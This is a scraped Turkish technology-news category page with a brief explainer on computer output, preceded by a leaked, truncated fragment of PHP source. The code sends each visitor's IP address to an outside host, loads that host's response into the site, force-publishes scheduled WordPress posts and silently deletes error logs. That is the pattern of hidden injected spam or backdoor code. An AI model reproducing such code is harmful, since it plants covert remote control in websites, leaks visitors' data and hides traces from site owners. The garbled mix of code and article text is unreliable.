$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Çıkış | Teknoloji Haberleri

Çıkış kategorisindeki tüm yazılar

Son Yazılar

Output Nedir?

Output (Çıkış), bilgisayarımızın çıkışı yardımıyla aktarılan verilerin tümü output’dır. Output’a verebileceğimiz en güzel örnek bilgisayarlarımızın monitörleridir. Monitörlere bilgisayarlar dışa dönük veri aktarırlar. Monitörlerimiz de bilgisayar tarafından aktarılmış olan bu veriyi bize yansıtırlar. Tıpkı bu örnekte olduğu gibi bir Printer da aynı zamanda output’a örnek verilebilir. Bilgisayarımızın gönderdiği